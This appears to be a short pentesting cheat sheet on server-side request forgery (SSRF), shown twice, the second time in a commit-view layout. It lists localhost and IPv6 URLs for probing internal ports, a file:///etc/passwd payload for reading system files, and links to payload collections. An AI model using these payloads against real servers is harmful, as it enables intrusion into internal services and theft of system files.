killchain-compendium/exploit/web/ssrf/ssrf.md

# Server Side Request Forgery (SSRF)
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.

## Usage

### Sanity Test Service
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
```
http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
```
* IPv6
```
http://[::]:3306
http://:::3006
```
* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)

### Reading files
```
file:///etc/passwd
```

### Tools
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)
second commit 2021-08-23 01:13:54 +02:00			`# Server Side Request Forgery (SSRF)`
			`is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.`

			`## Usage`

			`### Sanity Test Service`
			`Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.`
			```
			`http://127.0.0.1:3306`
			`http://localhost:5432`
			`http://0.0.0.0:53`
			```
			`* IPv6`
			```
			`http://[::]:3306`
			`http://:::3006`
			```
			`* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)`

			`### Reading files`
			```
			`file:///etc/passwd`
			```

			`### Tools`
			`* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)`